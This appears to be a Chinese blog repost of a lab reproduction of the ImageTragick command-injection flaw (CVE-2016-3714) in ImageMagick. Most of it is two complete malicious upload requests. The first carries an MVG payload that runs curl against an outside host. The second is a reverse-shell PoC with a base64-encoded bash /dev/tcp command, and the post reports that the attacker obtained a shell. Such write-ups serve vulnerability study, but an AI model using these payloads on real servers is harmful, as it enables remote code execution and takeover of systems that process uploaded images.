Imagetragick 命令執行漏洞(CVE-2016–3714)
阿新 • • 發佈:2022-05-17
ImageMagick是一款使用量很廣的圖片處理程式,很多廠商都呼叫了這個程式進行圖片處理,包括圖片的伸縮、切割、水印、格式轉換等等。但近來有研究者發現,當用戶傳入一個包含『畸形內容』的圖片的時候,就有可能觸發命令注入漏洞。
參考連結:
- https://imagetragick.com
- https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html
- https://github.com/ImageTragick/PoCs
漏洞環境
執行如下命令啟動一個包含了Imagemagick 6.9.2-10的PHP伺服器:
docker-compose up -d
漏洞復現
訪問http://your-ip:8080/
即可檢視到一個上傳元件。
傳送如下資料包:
POST / HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymdcbmdQR1sDse9Et Content-Length: 312 ------WebKitFormBoundarymdcbmdQR1sDse9Et Content-Disposition: form-data; name="file_upload"; filename="1.gif" Content-Type: image/png push graphic-context viewbox 0 0 640 480 fill 'url(https://127.0.0.0/oops.jpg"|curl "192.168.75.150:9999)' pop graphic-context ------WebKitFormBoundarymdcbmdQR1sDse9Et--
可見,192.168.75.150:9999
已經接收到http請求,說明curl命令執行成功:
反彈shell POC:
POST / HTTP/1.1 Host: 192.168.75.130:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymdcbmdQR1sDse9Et Content-Length: 390 ------WebKitFormBoundarymdcbmdQR1sDse9Et Content-Disposition: form-data; name="file_upload"; filename="1.gif" Content-Type: image/png push graphic-context viewbox 0 0 640 480 fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNzUuMTUwLzk5OTkgMD4mMQ== | base64 -d | bash`"||id " )' pop graphic-context ------WebKitFormBoundarymdcbmdQR1sDse9Et--cl
Bp重放發包,Kali拿到Shell